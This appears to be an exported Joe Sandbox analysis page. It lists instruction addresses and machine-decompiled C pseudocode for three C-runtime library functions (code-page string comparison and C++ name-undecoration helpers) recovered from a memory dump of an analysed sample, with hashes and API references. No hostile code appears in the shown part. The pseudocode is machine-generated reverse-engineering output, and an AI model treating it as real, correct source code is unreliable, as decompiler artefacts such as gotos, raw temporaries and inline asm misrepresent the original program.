                                                                                              0x01381165
                                                                                              0x01381168
                                                                                              0x0138116d
                                                                                              0x0138116d
                                                                                              0x01381170
                                                                                              0x013811b7
                                                                                              0x013811b9
                                                                                              0x013811bb
                                                                                              0x0138118c
                                                                                              0x01381191
                                                                                              0x01381198
                                                                                              0x0138119e
                                                                                              0x00000000
                                                                                              0x013811bd
                                                                                              0x013811bf
                                                                                              0x013811c1
                                                                                              0x013811c2
                                                                                              0x013811c4
                                                                                              0x013811c6
                                                                                              0x013811c6
                                                                                              0x013811d0
                                                                                              0x013811d2
                                                                                              0x013811d9
                                                                                              0x013811de
                                                                                              0x013811e1
                                                                                              0x013811e4
                                                                                              0x013811e6
                                                                                              0x0138120c
                                                                                              0x01381214
                                                                                              0x01381217
                                                                                              0x0138121e
                                                                                              0x01381225
                                                                                              0x01381229
                                                                                              0x0138122b
                                                                                              0x01381232
                                                                                              0x01381232
                                                                                              0x01381235
                                                                                              0x01381235
                                                                                              0x01381238
                                                                                              0x0138123a
                                                                                              0x0138123d
                                                                                              0x01381240
                                                                                              0x01381245
                                                                                              0x01381248
                                                                                              0x01381251
                                                                                              0x01381251
                                                                                              0x01381255
                                                                                              0x01381258
                                                                                              0x0138125a
                                                                                              0x01381260
                                                                                              0x01381262
                                                                                              0x0138126b
                                                                                              0x0138126c
                                                                                              0x0138126e
                                                                                              0x01381272
                                                                                              0x01381273
                                                                                              0x01381277
                                                                                              0x01381281
                                                                                              0x01381286
                                                                                              0x01381289
                                                                                              0x01381298
                                                                                              0x01381298
                                                                                              0x0138129c
                                                                                              0x0138129f
                                                                                              0x013812a1
                                                                                              0x013812a3
                                                                                              0x013812a5
                                                                                              0x013812aa
                                                                                              0x013812ac
                                                                                              0x013812b0
                                                                                              0x013812b1
                                                                                              0x013812b7
                                                                                              0x013812c1
                                                                                              0x013812c2
                                                                                              0x013812c7
                                                                                              0x013812ca
                                                                                              0x013812d9
                                                                                              0x013812d9
                                                                                              0x013812dd
                                                                                              0x013812e0
                                                                                              0x013812e2
                                                                                              0x013812e4
                                                                                              0x013812e6
                                                                                              0x013812e8
                                                                                              0x013812ee
                                                                                              0x013812ee
                                                                                              0x013812ef
                                                                                              0x013812fe
                                                                                              0x013812ff
                                                                                              0x013812ff
                                                                                              0x013812e6
                                                                                              0x013812e2
                                                                                              0x013812ca
                                                                                              0x013812a5
                                                                                              0x013812a1
                                                                                              0x01381289
                                                                                              0x01381262
                                                                                              0x0138125a
                                                                                              0x01381305
                                                                                              0x0138130b
                                                                                              0x0138130d
                                                                                              0x0138137e
                                                                                              0x0138137e
                                                                                              0x01381382
                                                                                              0x01381389
                                                                                              0x01381390
                                                                                              0x01381396
                                                                                              0x01381398
                                                                                              0x013813f6
                                                                                              0x013813f6
                                                                                              0x013813fe
                                                                                              0x013813ff
                                                                                              0x01381401
                                                                                              0x0138141a
                                                                                              0x0138141d
                                                                                              0x0138135a
                                                                                              0x0138135b
                                                                                              0x00000000
                                                                                              0x01381360
                                                                                              0x01381423
                                                                                              0x00000000
                                                                                              0x01381423
                                                                                              0x01381408
                                                                                              0x01381413
                                                                                              0x00000000
                                                                                              0x01381413
                                                                                              0x0138139a
                                                                                              0x0138139d
                                                                                              0x013813a0
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x013813a2
                                                                                              0x013813a2
                                                                                              0x013813a5
                                                                                              0x013813a8
                                                                                              0x013813ab
                                                                                              0x013813b2
                                                                                              0x013813b7
                                                                                              0x013813b9
                                                                                              0x013813bd
                                                                                              0x013813d8
                                                                                              0x013813dc
                                                                                              0x013813dd
                                                                                              0x013813e0
                                                                                              0x013813e3
                                                                                              0x013813ef
                                                                                              0x013813e5
                                                                                              0x013813e5
                                                                                              0x013813e5
                                                                                              0x013813bf
                                                                                              0x013813bf
                                                                                              0x013813bf
                                                                                              0x013813ca
                                                                                              0x013813cf
                                                                                              0x013813d2
                                                                                              0x013813d2
                                                                                              0x00000000
                                                                                              0x013813b7
                                                                                              0x01381312
                                                                                              0x01381315
                                                                                              0x0138131c
                                                                                              0x01381321
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0138132a
                                                                                              0x01381330
                                                                                              0x01381332
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01381334
                                                                                              0x01381338
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01381343
                                                                                              0x0138134a
                                                                                              0x01381350
                                                                                              0x01381352
                                                                                              0x01381376
                                                                                              0x01381379
                                                                                              0x00000000
                                                                                              0x01381379
                                                                                              0x01381354
                                                                                              0x00000000
                                                                                              0x013811e8
                                                                                              0x013811ed
                                                                                              0x013811f8
                                                                                              0x01381361
                                                                                              0x01381361
                                                                                              0x01381361
                                                                                              0x01381364
                                                                                              0x01381365
                                                                                              0x0138136b
                                                                                              0x00000000
                                                                                              0x0138136d
                                                                                              0x013811e6
                                                                                              0x013811bb
                                                                                              0x01381172
                                                                                              0x01381175
                                                                                              0x01381186
                                                                                              0x01381188
                                                                                              0x0138118a
                                                                                              0x013811a8
                                                                                              0x013811ab
                                                                                              0x013811ad
                                                                                              0x013811b0
                                                                                              0x00000000
                                                                                              0x013811b0
                                                                                              0x00000000
                                                                                              0x01381177
                                                                                              0x01381177
                                                                                              0x01381179
                                                                                              0x0138117c
                                                                                              0x00000000
                                                                                              0x0138117c
                                                                                              0x01381175
                                                                                              0x01381129
                                                                                              0x0138112e
                                                                                              0x01381136
                                                                                              0x00000000
                                                                                              0x013810c0
                                                                                              0x013810c5
                                                                                              0x013810c8
                                                                                              0x013810cd
                                                                                              0x01381446
                                                                                              0x01381446
                                                                                              0x01381449
                                                                                              0x0138144c
                                                                                              0x0138144c

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.302442957.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000002.00000002.302434278.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302498108.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302524997.000000000139E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302537308.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0df59511d5e0629d55a73994ad3304d0edb3986a3573d598b2d27ea05bb27fcc
                                                                                              • Instruction ID: cdfb70d7dcf5d5343859703ec9933edd61a23e46dda7975b98535e0b3b0b975e
                                                                                              • Opcode Fuzzy Hash: 0df59511d5e0629d55a73994ad3304d0edb3986a3573d598b2d27ea05bb27fcc
                                                                                              • Instruction Fuzzy Hash: F2B12570E0034AAFDB11EF9DC880BADBFF9BF45308F548158E541AB691C7B09A42CB60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0138AAC7 Relevance: 9.2, APIs: 6, Instructions: 248COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 82%
                                                                                              			E0138AAC7(signed int _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, int _a20, intOrPtr* _a24, intOrPtr* _a28, int _a32) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				signed int _v32;
				intOrPtr* _v36;
				signed int _v40;
				intOrPtr _v44;
				void* _v56;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t49;
				int _t54;
				signed int _t59;
				signed int _t60;
				void* _t63;
				signed int _t64;
				signed int _t65;
				int _t71;
				char* _t76;
				char* _t77;
				int _t81;
				int _t82;
				intOrPtr _t94;
				intOrPtr _t95;
				signed int _t103;
				void* _t104;
				int _t106;
				void* _t107;
				intOrPtr* _t108;

				_t49 =  *0x139e210; // 0xbb40e64e
				_v8 = _t49 ^ _t103;
				_t83 = _a24;
				_v40 = _a4;
				_t102 = _a20;
				_v44 = _a8;
				_t53 = _a16;
				_v32 = _a16;
				_v36 = _a24;
				if(_t102 <= 0) {
					if(_t102 < 0xffffffff) {
						goto L54;
					} else {
						goto L3;
					}
				} else {
					_t81 = E01389DC4(_t53, _t102);
					_t83 = _v36;
					_t102 = _t81;
					L3:
					_t101 = _a28;
					if(_t101 <= 0) {
						if(_t101 < 0xffffffff) {
							goto L54;
						} else {
							goto L6;
						}
					} else {
						_t101 = E01389DC4(_t83, _t101);
						_a28 = _t101;
						L6:
						_t82 = _a32;
						if(_t82 == 0) {
							_t82 =  *( *_v40 + 8);
							_a32 = _t82;
						}
						if(_t102 == 0 || _t101 == 0) {
							if(_t102 == _t101) {
								L61:
								_push(2);
								goto L23;
							} else {
								if(_t101 > 1) {
									L32:
									_t54 = 1;
								} else {
									if(_t102 > 1) {
										L22:
										_push(3);
										goto L23;
									} else {
										if(GetCPInfo(_t82,  &_v28) == 0) {
											goto L54;
										} else {
											if(_t102 <= 0) {
												if(_t101 <= 0) {
													goto L33;
												} else {
													if(_v28 >= 2) {
														_t76 =  &_v22;
														if(_v22 != 0) {
															_t101 = _v36;
															while(1) {
																_t94 =  *((intOrPtr*)(_t76 + 1));
																if(_t94 == 0) {
																	goto L32;
																}
																_t100 =  *_t101;
																if(_t100 <  *_t76 || _t100 > _t94) {
																	_t76 = _t76 + 2;
																	if( *_t76 != 0) {
																		continue;
																	} else {
																		goto L32;
																	}
																} else {
																	goto L61;
																}
																goto L55;
															}
														}
													}
													goto L32;
												}
											} else {
												if(_v28 >= 2) {
													_t77 =  &_v22;
													if(_v22 != 0) {
														_t102 = _v32;
														while(1) {
															_t95 =  *((intOrPtr*)(_t77 + 1));
															if(_t95 == 0) {
																goto L22;
															}
															_t100 =  *_t102;
															if(_t100 <  *_t77 || _t100 > _t95) {
																_t77 = _t77 + 2;
																if( *_t77 != 0) {
																	continue;
																} else {
																	goto L22;
																}
															} else {
																goto L61;
															}
															goto L23;
														}
													}
												}
												goto L22;
												L23:
												_pop(_t54);
											}
										}
									}
								}
							}
						} else {
							L33:
							_t59 = E01368A28(_t82, 9, _v32, _t102, 0, 0);
							_t106 = _t104 + 0x18;
							_v40 = _t59;
							if(_t59 == 0) {
								L54:
								_t54 = 0;
							} else {
								_t100 = _t59 + _t59 + 8;
								asm("sbb eax, eax");
								_t60 = _t59 & _t59 + _t59 + 0x00000008;
								if(_t60 == 0) {
									L60:
									_push(0);
									goto L59;
								} else {
									if(_t60 > 0x400) {
										_t82 = E01367865(_t60);
										if(_t82 == 0) {
											goto L60;
										} else {
											 *_t82 = 0xdddd;
											goto L40;
										}
									} else {
										E01386540(_t60);
										_t82 = _t106;
										if(_t82 == 0) {
											goto L60;
										} else {
											 *_t82 = 0xcccc;
											L40:
											_t82 = _t82 + 8;
											if(_t82 == 0) {
												goto L60;
											} else {
												_t102 = _a32;
												_t63 = E01368A28(_a32, 1, _v32, _a32, _t82, _v40);
												_t107 = _t106 + 0x18;
												if(_t63 == 0) {
													L58:
													_push(_t82);
													L59:
													E013688F6();
													goto L53;
												} else {
													_t101 = _v36;
													_t64 = E01368A28(_t102, 9, _v36, _v36, 0, 0);
													_t108 = _t107 + 0x18;
													_v32 = _t64;
													if(_t64 == 0) {
														goto L58;
													} else {
														_t100 = _t64 + _t64 + 8;
														asm("sbb eax, eax");
														_t65 = _t64 & _t64 + _t64 + 0x00000008;
														if(_t65 == 0) {
															L57:
															_push(0);
															goto L52;
														} else {
															if(_t65 > 0x400) {
																_t101 = E01367865(_t65);
																if(_t101 == 0) {
																	goto L57;
																} else {
																	 *_t101 = 0xdddd;
																	goto L49;
																}
															} else {
																E01386540(_t65);
																_t101 = _t108;
																if(_t101 == 0) {
																	goto L57;
																} else {
																	 *_t101 = 0xcccc;
																	L49:
																	_t101 = _t101 + 8;
																	if(_t101 == 0) {
																		goto L57;
																	} else {
																		if(E01368A28(_t102, 1, _v36, _a28, _t101, _v32) != 0) {
																			_t71 = E01362655(_v44, _a12, _t82, _v40, _t101, _v32, 0, 0, 0);
																			_t102 = _t71;
																			E013688F6(_t101);
																			E013688F6(_t82);
																			_t54 = _t71;
																		} else {
																			_push(_t101);
																			L52:
																			E013688F6();
																			E013688F6(_t82);
																			L53:
																			goto L54;
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
				L55:
				return L01353E0D(_t54, _t82, _v8 ^ _t103, _t100, _t101, _t102);
			}

































                                                                                              0x0138aacf
                                                                                              0x0138aad6
                                                                                              0x0138aadc
                                                                                              0x0138aae0
                                                                                              0x0138aae7
                                                                                              0x0138aaea
                                                                                              0x0138aaed
                                                                                              0x0138aaf0
                                                                                              0x0138aaf3
                                                                                              0x0138aaf9
                                                                                              0x0138ab0e
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0138aafb
                                                                                              0x0138aafd
                                                                                              0x0138ab04
                                                                                              0x0138ab07
                                                                                              0x0138ab14
                                                                                              0x0138ab14
                                                                                              0x0138ab19
                                                                                              0x0138ab2e
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0138ab1b
                                                                                              0x0138ab23
                                                                                              0x0138ab26
                                                                                              0x0138ab34
                                                                                              0x0138ab34
                                                                                              0x0138ab39
                                                                                              0x0138ab40
                                                                                              0x0138ab43
                                                                                              0x0138ab43
                                                                                              0x0138ab48
                                                                                              0x0138ab54
                                                                                              0x0138ad5f
                                                                                              0x0138ad5f
                                                                                              0x00000000
                                                                                              0x0138ab5a
                                                                                              0x0138ab5d
                                                                                              0x0138abe9
                                                                                              0x0138abeb
                                                                                              0x0138ab63
                                                                                              0x0138ab66
                                                                                              0x0138abae
                                                                                              0x0138abae
                                                                                              0x00000000
                                                                                              0x0138ab68
                                                                                              0x0138ab75
                                                                                              0x00000000
                                                                                              0x0138ab7b
                                                                                              0x0138ab7d
                                                                                              0x0138abb8
                                                                                              0x00000000
                                                                                              0x0138abba
                                                                                              0x0138abbe
                                                                                              0x0138abc4
                                                                                              0x0138abc7
                                                                                              0x0138abc9
                                                                                              0x0138abcc
                                                                                              0x0138abcc
                                                                                              0x0138abd1
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0138abd3
                                                                                              0x0138abd7
                                                                                              0x0138abe1
                                                                                              0x0138abe7
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0138abd7
                                                                                              0x0138abcc
                                                                                              0x0138abc7
                                                                                              0x00000000
                                                                                              0x0138abbe
                                                                                              0x0138ab7f
                                                                                              0x0138ab83
                                                                                              0x0138ab89
                                                                                              0x0138ab8c
                                                                                              0x0138ab8e
                                                                                              0x0138ab91
                                                                                              0x0138ab91
                                                                                              0x0138ab96
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0138ab98
                                                                                              0x0138ab9c
                                                                                              0x0138aba6
                                                                                              0x0138abac
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0138ab9c
                                                                                              0x0138ab91
                                                                                              0x0138ab8c
                                                                                              0x00000000
                                                                                              0x0138abb0
                                                                                              0x0138abb0
                                                                                              0x0138abb0
                                                                                              0x0138ab7d
                                                                                              0x0138ab75
                                                                                              0x0138ab66
                                                                                              0x0138ab5d
                                                                                              0x0138abf1
                                                                                              0x0138abf1
                                                                                              0x0138abfc
                                                                                              0x0138ac01
                                                                                              0x0138ac04
                                                                                              0x0138ac09
                                                                                              0x0138ad0f
                                                                                              0x0138ad0f
                                                                                              0x0138ac0f
                                                                                              0x0138ac12
                                                                                              0x0138ac17
                                                                                              0x0138ac19
                                                                                              0x0138ac1b
                                                                                              0x0138ad5b
                                                                                              0x0138ad5b
                                                                                              0x00000000
                                                                                              0x0138ac21
                                                                                              0x0138ac26
                                                                                              0x0138ac45
                                                                                              0x0138ac4a
                                                                                              0x00000000
                                                                                              0x0138ac50
                                                                                              0x0138ac50
                                                                                              0x00000000
                                                                                              0x0138ac50
                                                                                              0x0138ac28
                                                                                              0x0138ac28
                                                                                              0x0138ac2d
                                                                                              0x0138ac31
                                                                                              0x00000000
                                                                                              0x0138ac37
                                                                                              0x0138ac37
                                                                                              0x0138ac56
                                                                                              0x0138ac56
                                                                                              0x0138ac5b
                                                                                              0x00000000
                                                                                              0x0138ac61
                                                                                              0x0138ac69
                                                                                              0x0138ac6f
                                                                                              0x0138ac74
                                                                                              0x0138ac79
                                                                                              0x0138ad53
                                                                                              0x0138ad53
                                                                                              0x0138ad54
                                                                                              0x0138ad54
                                                                                              0x00000000
                                                                                              0x0138ac7f
                                                                                              0x0138ac84
                                                                                              0x0138ac8b
                                                                                              0x0138ac90
                                                                                              0x0138ac93
                                                                                              0x0138ac98
                                                                                              0x00000000
                                                                                              0x0138ac9e
                                                                                              0x0138aca1
                                                                                              0x0138aca6
                                                                                              0x0138aca8
                                                                                              0x0138acaa
                                                                                              0x0138ad4f
                                                                                              0x0138ad4f
                                                                                              0x00000000
                                                                                              0x0138acb0
                                                                                              0x0138acb5
                                                                                              0x0138acd4
                                                                                              0x0138acd9
                                                                                              0x00000000
                                                                                              0x0138acdb
                                                                                              0x0138acdb
                                                                                              0x00000000
                                                                                              0x0138acdb
                                                                                              0x0138acb7
                                                                                              0x0138acb7
                                                                                              0x0138acbc
                                                                                              0x0138acc0
                                                                                              0x00000000
                                                                                              0x0138acc6
                                                                                              0x0138acc6
                                                                                              0x0138ace1
                                                                                              0x0138ace1
                                                                                              0x0138ace6
                                                                                              0x00000000
                                                                                              0x0138ace8
                                                                                              0x0138acff
                                                                                              0x0138ad36
                                                                                              0x0138ad3c
                                                                                              0x0138ad3e
                                                                                              0x0138ad44
                                                                                              0x0138ad4b
                                                                                              0x0138ad01
                                                                                              0x0138ad01
                                                                                              0x0138ad02
                                                                                              0x0138ad02
                                                                                              0x0138ad08
                                                                                              0x0138ad0e
                                                                                              0x00000000
                                                                                              0x0138ad0e
                                                                                              0x0138acff
                                                                                              0x0138ace6
                                                                                              0x0138acc0
                                                                                              0x0138acb5
                                                                                              0x0138acaa
                                                                                              0x0138ac98
                                                                                              0x0138ac79
                                                                                              0x0138ac5b
                                                                                              0x0138ac31
                                                                                              0x0138ac26
                                                                                              0x0138ac1b
                                                                                              0x0138ac09
                                                                                              0x0138ab48
                                                                                              0x0138ab19
                                                                                              0x0138ad11
                                                                                              0x0138ad22

                                                                                              APIs
                                                                                              • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,0138AAB2,00000000,00000000,00000000,00000000,?,?,?,?,00000000,00000000), ref: 0138AB6D
                                                                                              • __freea.LIBCMT ref: 0138AD02
                                                                                              • __freea.LIBCMT ref: 0138AD08
                                                                                              • __freea.LIBCMT ref: 0138AD3E
                                                                                              • __freea.LIBCMT ref: 0138AD44
                                                                                              • __freea.LIBCMT ref: 0138AD54
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.302442957.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000002.00000002.302434278.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302498108.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302524997.000000000139E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302537308.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: __freea$Info
                                                                                              • String ID:
                                                                                              • API String ID: 541289543-0
                                                                                              • Opcode ID: e69b260c4bfa786ea9de92e6439a1d0966bb243396732c60611eff6532488dd4
                                                                                              • Instruction ID: b6ed1375237bd8aa78cc1243123931764ed45810d7cf9c303b2a84c44db33310
                                                                                              • Opcode Fuzzy Hash: e69b260c4bfa786ea9de92e6439a1d0966bb243396732c60611eff6532488dd4
                                                                                              • Instruction Fuzzy Hash: 9F71DB7290030AABEF21BF5CCC51FAE7BBA9F4961CF184557EA04E7241E675D904C750
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01361579 Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E01361579(void* __fp0, intOrPtr* _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				char _v12;
				char _v20;
				char _v28;
				char _v36;
				intOrPtr _t27;
				intOrPtr _t38;
				char* _t39;
				void* _t48;
				intOrPtr* _t55;
				intOrPtr* _t65;
				intOrPtr _t67;
				char _t73;
				intOrPtr* _t75;
				void* _t77;
				void* _t78;
				void* _t90;

				_t90 = __fp0;
				_t55 = _a8;
				_t78 = _t77 - 0x20;
				_t75 = _a4;
				 *_t75 =  *_t55;
				_t27 =  *((intOrPtr*)(_t55 + 4));
				 *((intOrPtr*)(_t75 + 4)) = _t27;
				if(_t27 <= 1) {
					if( *((char*)( *0x13a0b18)) == 0) {
						E0135BB4B(E0135B826( &_v36, 1),  &_v12, _t75);
						 *_t75 = _v12;
						 *((intOrPtr*)(_t75 + 4)) = _v8;
					} else {
						E013600DB( &_v12);
						_t65 = E0135BB4B(E0135BB6D( &_v12,  &_v20, 0x20),  &_v28, _t75);
						 *_t75 =  *_t65;
						_t38 =  *((intOrPtr*)(_t65 + 4));
						 *((intOrPtr*)(_t75 + 4)) = _t38;
						if(_t38 <= 1) {
							_t39 =  *0x13a0b18;
							if( *_t39 == 0x40) {
								L19:
								 *0x13a0b18 = _t39 + 1;
							} else {
								_v12 = "{for ";
								_v8 = 5;
								while(1) {
									L5:
									E0135BC28(_t75,  &_v12);
									_t39 =  *0x13a0b18;
									while(1) {
										_t67 =  *((intOrPtr*)(_t75 + 4));
										if(_t67 > 1) {
											break;
										}
										_t73 =  *_t39;
										if(_t73 == 0) {
											L15:
											if( *_t39 == 0) {
												E0135BCE4(_t75, 1);
											}
											E0135BBD3(_t75, 0x7d);
											_t39 =  *0x13a0b18;
										} else {
											if(_t73 == 0x40) {
												if(_t67 <= 1) {
													goto L15;
												}
											} else {
												_t48 = L0135BE4F(_t67,  &_v20, 0x60, L0135CD2F(_t73, _t90,  &_v28));
												_t78 = _t78 + 0x10;
												E0135BD24(_t75, E0135BB6D(_t48,  &_v36, 0x27));
												_t39 =  *0x13a0b18;
												if( *_t39 == 0x40) {
													_t39 = _t39 + 1;
													 *0x13a0b18 = _t39;
												}
												if( *((intOrPtr*)(_t75 + 4)) > 1 ||  *_t39 == 0x40) {
													continue;
												} else {
													_v12 = "s ";
													_v8 = 2;
													goto L5;
												}
												goto L21;
											}
										}
										break;
									}
									if( *_t39 == 0x40) {
										goto L19;
									}
									goto L21;
								}
							}
						}
					}
				}
				L21:
				return _t75;
			}




















                                                                                              0x01361579
                                                                                              0x0136157c
                                                                                              0x0136157f
                                                                                              0x01361586
                                                                                              0x0136158c
                                                                                              0x0136158e
                                                                                              0x01361591
                                                                                              0x01361596
                                                                                              0x013615a4
                                                                                              0x013616b7
                                                                                              0x013616bf
                                                                                              0x013616c4
                                                                                              0x013615aa
                                                                                              0x013615ae
                                                                                              0x013615ce
                                                                                              0x013615d2
                                                                                              0x013615d4
                                                                                              0x013615d7
                                                                                              0x013615dc
                                                                                              0x013615e2
                                                                                              0x013615ea
                                                                                              0x0136169f
                                                                                              0x013616a0
                                                                                              0x013615f0
                                                                                              0x013615f0
                                                                                              0x013615f7
                                                                                              0x013615fe
                                                                                              0x013615fe
                                                                                              0x01361604
                                                                                              0x01361609
                                                                                              0x0136160e
                                                                                              0x0136160e
                                                                                              0x01361613
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01361619
                                                                                              0x0136161d
                                                                                              0x0136167f
                                                                                              0x01361682
                                                                                              0x01361687
                                                                                              0x01361687
                                                                                              0x01361690
                                                                                              0x01361695
                                                                                              0x0136161f
                                                                                              0x01361622
                                                                                              0x0136167d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01361624
                                                                                              0x01361634
                                                                                              0x01361639
                                                                                              0x0136164c
                                                                                              0x01361651
                                                                                              0x01361659
                                                                                              0x0136165b
                                                                                              0x0136165c
                                                                                              0x0136165c
                                                                                              0x01361664
                                                                                              0x00000000
                                                                                              0x0136166b
                                                                                              0x0136166b
                                                                                              0x01361672
                                                                                              0x00000000
                                                                                              0x01361672
                                                                                              0x00000000
                                                                                              0x01361664
                                                                                              0x01361622
                                                                                              0x00000000
                                                                                              0x0136161d
                                                                                              0x0136169d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0136169d
                                                                                              0x013615fe
                                                                                              0x013615ea
                                                                                              0x013615dc
                                                                                              0x013615a4
                                                                                              0x013616c7
                                                                                              0x013616cc

                                                                                              APIs
                                                                                              • DName::operator+.LIBCMT ref: 013615BD
                                                                                              • DName::operator+.LIBCMT ref: 013615C9
                                                                                              • DName::operator+=.LIBCMT ref: 01361687
                                                                                                • Part of subcall function 0135BE4F: DName::operator+.LIBCMT ref: 0135BE70
                                                                                              • DName::operator+.LIBCMT ref: 01361644
                                                                                                • Part of subcall function 0135BD24: DName::operator=.LIBVCRUNTIME ref: 0135BD45
                                                                                              • DName::DName.LIBVCRUNTIME ref: 013616AB
                                                                                              • DName::operator+.LIBCMT ref: 013616B7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.302442957.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000002.00000002.302434278.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302498108.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302524997.000000000139E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302537308.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: Name::operator+$NameName::Name::operator+=Name::operator=
                                                                                              • String ID:
                                                                                              • API String ID: 357316741-0
                                                                                              • Opcode ID: 3a2ce640640785eaa0bcdded62e5168bb489b4f94435309ca8566122e4c62c3d
                                                                                              • Instruction ID: d0d984f3d13d246adda9426018c38d3720199c05e1cf24d9cb3faa27aef1ebda
                                                                                              • Opcode Fuzzy Hash: 3a2ce640640785eaa0bcdded62e5168bb489b4f94435309ca8566122e4c62c3d
                                                                                              • Instruction Fuzzy Hash: 21410BB4A002489FDB24DF6CC490FAEFFFDAB49718F444458E58697298D7359D40C754
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0135D0ED Relevance: 9.1, APIs: 6, Instructions: 94COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 86%
                                                                                              			E0135D0ED(void* __edx, void* __eflags, void* __fp0, intOrPtr* _a4) {
				char _v8;
				char _v12;
				char _v20;
				char _v28;
				char _v36;
				void* __edi;
				intOrPtr* _t25;
				intOrPtr _t26;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t37;
				intOrPtr _t39;
				intOrPtr _t40;
				intOrPtr _t41;
				intOrPtr _t58;
				intOrPtr* _t60;

				_t60 = _a4;
				 *_t60 = 0;
				 *((intOrPtr*)(_t60 + 4)) = 0;
				_t25 = E0135C1FB(__edx, 0, __fp0,  &_v12, 1, 0);
				_t40 =  *_t25;
				_t58 = _t40;
				 *_t60 = _t40;
				_t26 =  *((intOrPtr*)(_t25 + 4));
				 *((intOrPtr*)(_t60 + 4)) = _t26;
				_t27 =  *0x13a0b18;
				if(_t26 == 0) {
					_t39 =  *_t27;
					if(_t39 != 0 && _t39 != 0x40) {
						_v12 = "::";
						_v8 = 2;
						_t37 = E0135BB4B(E0135BB29(L0135CD2F(_t58, __fp0,  &_v20),  &_v28,  &_v12),  &_v36, _t60);
						_t58 =  *_t37;
						 *_t60 = _t58;
						 *((intOrPtr*)(_t60 + 4)) =  *((intOrPtr*)(_t37 + 4));
						_t27 =  *0x13a0b18;
					}
				}
				_t41 =  *_t27;
				if(_t41 != 0x40) {
					if(_t41 == 0) {
						_push(1);
						if(_t58 != 0) {
							_v12 = "::";
							_v8 = 2;
							_t30 = E0135BB4B(E0135BB29(E0135B826( &_v36),  &_v28,  &_v12),  &_v20, _t60);
							 *_t60 =  *_t30;
							 *((intOrPtr*)(_t60 + 4)) =  *((intOrPtr*)(_t30 + 4));
						} else {
							E0135BDFB(_t60);
						}
					} else {
						 *((intOrPtr*)(_t60 + 4)) = 0;
						 *((char*)(_t60 + 4)) = 2;
						 *_t60 = 0;
					}
				} else {
					 *0x13a0b18 = _t27 + 1;
				}
				return _t60;
			}



















                                                                                              0x0135d0f8
                                                                                              0x0135d102
                                                                                              0x0135d104
                                                                                              0x0135d107
                                                                                              0x0135d10f
                                                                                              0x0135d111
                                                                                              0x0135d113
                                                                                              0x0135d115
                                                                                              0x0135d11a
                                                                                              0x0135d11d
                                                                                              0x0135d122
                                                                                              0x0135d124
